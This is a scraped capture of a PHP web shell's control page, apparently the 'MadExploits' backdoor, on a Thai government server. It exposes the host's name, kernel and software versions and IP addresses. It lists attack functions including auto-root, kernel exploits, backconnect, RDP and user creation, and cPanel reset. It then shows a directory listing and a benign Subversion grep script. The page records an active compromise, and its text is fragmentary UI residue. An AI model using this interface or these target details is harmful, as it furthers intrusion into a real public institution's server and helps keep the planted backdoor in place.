Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
subversion-1.6.11 /
[ HOME SHELL ]
Name
Size
Permission
Action
tools
[ DIR ]
drwxr-xr-x
BUGS
107
B
-rw-r--r--
CHANGES
161.56
KB
-rw-r--r--
COMMITTERS
10.71
KB
-rw-r--r--
COPYING
2.72
KB
-rw-r--r--
HACKING
113
B
-rw-r--r--
INSTALL
65.83
KB
-rw-r--r--
LICENSE
2.29
KB
-rw-r--r--
README
2.19
KB
-rw-r--r--
mod_authz_svn-INSTALL
4.54
KB
-rw-r--r--
svn_load_dirs.README
9.35
KB
-rw-r--r--
svn_load_dirs.pl
65.6
KB
-rwxr-xr-x
svn_load_dirs_property_table.e...
1.3
KB
-rw-r--r--
svnmerge-migrate-history-remot...
18.28
KB
-rwxr-xr-x
svnmerge-migrate-history.py
15.75
KB
-rwxr-xr-x
svnmerge.README
1011
B
-rw-r--r--
svnmerge.py
81.67
KB
-rwxr-xr-x
svnmerge_test.py
50.05
KB
-rwxr-xr-x
wcgrep
2.33
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wcgrep
#!/bin/bash # Copyright 2004 Ben Reser <ben@reser.org> # Licensed under the terms subversion ships under or GPLv2. # Useful for greping in a subversion working copy. # Essentially it behaves the same way your grep command does (in fact it # ultimately calls the grep command on your path) with a few exceptions. # Ignores the subversion admin directories (.svn) and vi(m) backup files. # Recursive is always on with or without -r. # Always print filename and line numbers. # Ignores binary files. # If no path is given the current working directory is searched not stdin. # Other than that it will take any parameter or pattern your standard grep # does. # # This script requires GNU findutils and by default GNU grep (though that # can be changed with environment variables). # # There are three environment variables you can set that modify the default # behavior: # # WCGREP_GREP Controls what command is used for the grep command. # If unset or null wcgrep will use the command named grep. # WCGREP_GREPARGS Controls what arguments are always passed to the grep # command before the arguments given on the command line. # If unset or null it defaults to -HnI (always print file # names, line numbers and ignore binary files). If you wish # to set no default args set the variable to a space (" "). # WCGREP_IGNORE Controls what files are ignored by the grep command. # This is a regex that is passed to the find command with # -regex so see find's man page for details. If unset or # null defaults to '.*~$\|.*/\.svn\(/\|$\)', which will # ignore vim backup files and subversion admin dirs. arg_count=$# for (( i=1; i <= $arg_count; i++ )); do arg="$1" shift 1 if [ -z "$pattern" ]; then if [ "$arg" == "--" ]; then grepargs="$grepargs $arg" pattern="$1" shift 1 ((i++)) elif [ "${arg:0:1}" != "-" ]; then pattern="$arg" else grepargs="$grepargs $arg" fi else pathargs="$pathargs $arg" fi done find $pathargs -regex ${WCGREP_IGNORE:-'.*~$\|.*/\.svn\(/\|$\)'} -prune -o \ -type f -print0 | xargs -r0 ${WCGREP_GREP:-grep} ${WCGREP_GREPARGS:--HnI} \ $grepargs "$pattern"
Close